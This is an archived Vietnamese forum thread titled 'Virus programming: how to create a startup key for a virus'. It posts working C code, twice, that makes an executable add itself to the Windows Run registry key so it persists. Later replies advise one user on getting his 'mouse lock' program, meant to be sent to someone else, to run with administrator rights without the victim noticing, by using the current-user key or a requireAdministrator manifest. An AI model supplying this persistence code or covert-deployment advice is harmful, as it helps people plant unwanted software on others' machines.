PDA

View Full Version : Lập trình Virus | Cách tạo Key khởi động cho Virus



AlexF
22-05-2009, 10:38 PM
yêu cầu ai copy paste để lại bài viết thuộc về congdongcviet nhá



#include <windows.h>

int main(void)

{
/* Grab filename of process/exe using GetModuleFileName() function. */
TCHAR szPath[MAX_PATH];


GetModuleFileName(NULL,
szPath,
MAX_PATH);


/* Create a New HKEY. */
HKEY newValue;

/* Open Registry key. */

RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&newValue);

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run to add for the

current user only.

Now give a new value.

Syntax for RegSetValueEx() function is
LONG WINAPI RegSetValueEx(
__in HKEY hKey,
__in_opt LPCTSTR lpValueName,

__reserved DWORD Reserved,
__in DWORD dwType,
__in_opt const BYTE* lpData,
__in DWORD cbData
);

More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */


RegSetValueEx(newValue,
"Name_Me_Please",
0,

REG_SZ,
(LPBYTE)szPath,
sizeof(szPath));


/* Close the key. */
RegCloseKey(newValue);
return 0;

}

boychiyeu_motnguoi10390
22-09-2009, 05:01 PM
bài này chạy virut máy mình hay máy người khác bạn; hỏi trước không chạy die máy mình thì khổ :D

mini_bestboy
28-06-2011, 03:41 PM
Bạn có thể trình bày rõ cách hoạt động trong chương trình của bạn cho mọi ngưởi cùng rõ với được không 0:)
Mình coi tuy cũng biết sơ sơ nhưng chưa được rõ lắm, như cụ thể thì 2 hàm RegKeyOpen với RegSetValueEx hoạt động thế nào ?

Thanks !

meoconlongvang
29-06-2011, 09:46 AM
Bạn có thể trình bày rõ cách hoạt động trong chương trình của bạn cho mọi ngưởi cùng rõ với được không 0:)
Mình coi tuy cũng biết sơ sơ nhưng chưa được rõ lắm, như cụ thể thì 2 hàm RegKeyOpen với RegSetValueEx hoạt động thế nào ?

Thanks !

Mình chưa hiểu rõ câu hỏi của bạn. Nhưng công dụng của 2 hàm trên thì dùng để :
RegKeyOpen -> mở key
RegSetValueEx -> gán giá trị cho key đã mở

mini_bestboy
29-06-2011, 03:19 PM
Mình chưa hiểu rõ câu hỏi của bạn. Nhưng công dụng của 2 hàm trên thì dùng để :
RegKeyOpen -> mở key
RegSetValueEx -> gán giá trị cho key đã mở

Thế cho mình hỏi là cái chuỗi "Name_me_please" trong hàm RegSetValueEx là tên file con virus của mình cần cài vô phải không ? Sau khi thực hiện xong hàm này thì trong key Run sẽ có thêm 1 "string value" là địa chỉ con virus đó à (như 1 số string value có sẵn trong key)
0:)

meoconlongvang
29-06-2011, 03:44 PM
Sau khi set xong thì sẽ có thêm 1 key khởi động với tên là name_me_please, đường dẫn chỉ đến file exe

luanft
22-09-2013, 12:10 PM
yêu cầu ai copy paste để lại bài viết thuộc về congdongcviet nhá



#include <windows.h>

int main(void)

{
/* Grab filename of process/exe using GetModuleFileName() function. */
TCHAR szPath[MAX_PATH];


GetModuleFileName(NULL,
szPath,
MAX_PATH);


/* Create a New HKEY. */
HKEY newValue;

/* Open Registry key. */

RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&newValue);

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run to add for the

current user only.

Now give a new value.

Syntax for RegSetValueEx() function is
LONG WINAPI RegSetValueEx(
__in HKEY hKey,
__in_opt LPCTSTR lpValueName,

__reserved DWORD Reserved,
__in DWORD dwType,
__in_opt const BYTE* lpData,
__in DWORD cbData
);

More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */


RegSetValueEx(newValue,
"Name_Me_Please",
0,

REG_SZ,
(LPBYTE)szPath,
sizeof(szPath));


/* Close the key. */
RegCloseKey(newValue);
return 0;

}

Sorry đã đào mộ bài này lên. Mình copy đoạn mã này về dịch. nhưng khi vào registry không thấy khóa nào hết. Mình dùng Visual studio 2010 và win 7

noone2407
29-09-2013, 07:39 PM
Sorry đã đào mộ bài này lên. Mình copy đoạn mã này về dịch. nhưng khi vào registry không thấy khóa nào hết. Mình dùng Visual studio 2010 và win 7

Trong win 7 thì muốn ghi vào HKEY_LOCAL_MACHINE bạn phải chạy dưới quyền admin. Chuột phải vào file exe chọn run as administrator

luanft
29-09-2013, 07:53 PM
Trong win 7 thì muốn ghi vào HKEY_LOCAL_MACHINE bạn phải chạy dưới quyền admin. Chuột phải vào file exe chọn run as administrator

Mình có làm một con khóa chuột. Nhưng làm sao để ghi nó chạy dưới quyền sa hả bạn?

noone2407
30-09-2013, 09:32 AM
Mình có làm một con khóa chuột. Nhưng làm sao để ghi nó chạy dưới quyền sa hả bạn?

Chuột phải vào file exe chọn run as administrator.

luanft
30-09-2013, 10:42 AM
Chuột phải vào file exe chọn run as administrator.
Bạn hiểu sai ý mình rồi. Nếu mình viết rồi gửi cho một người nào đó. nếu như bắt người ta chạy sa thì lộ hết rồi. Ý mình là làm sao nó chạy luôn dưới quyền sa sau khi kích hoạt từ usb hay từ một file nào đó

noone2407
30-09-2013, 09:11 PM
Bạn hiểu sai ý mình rồi. Nếu mình viết rồi gửi cho một người nào đó. nếu như bắt người ta chạy sa thì lộ hết rồi. Ý mình là làm sao nó chạy luôn dưới quyền sa sau khi kích hoạt từ usb hay từ một file nào đó

Thì đừng ghi key vào HKEY_LOCAL_MACHINE nữa sao không ghi vào HKEY_CURRENT_USER ấy.

luanft
01-10-2013, 01:24 PM
Thì đừng ghi key vào HKEY_LOCAL_MACHINE nữa sao không ghi vào HKEY_CURRENT_USER ấy.
Cảm ơn bạn, mình thấy các phần mềm khi cài vào máy thì luôn được hỏi là:
All user or just me. Và key trong registry cũng được ghi vào HKEY_LOCAL_MACHINE. Có cách nào để mình cài như vậy không?
PS: Mình không biết viết mã của file cài đặt.

noone2407
01-10-2013, 10:22 PM
Cảm ơn bạn, mình thấy các phần mềm khi cài vào máy thì luôn được hỏi là:
All user or just me. Và key trong registry cũng được ghi vào HKEY_LOCAL_MACHINE. Có cách nào để mình cài như vậy không?
PS: Mình không biết viết mã của file cài đặt.

Để chạy admin thì có bạn cứ add file manifest
trong đó có dòng
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

là nó chạy admin, khi đó muốn làm gì cũng được

luanft
02-10-2013, 02:24 PM
Để chạy admin thì có bạn cứ add file manifest
trong đó có dòng
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

là nó chạy admin, khi đó muốn làm gì cũng được
Cảm ơn bạn nhé! Mình làm được rồi :D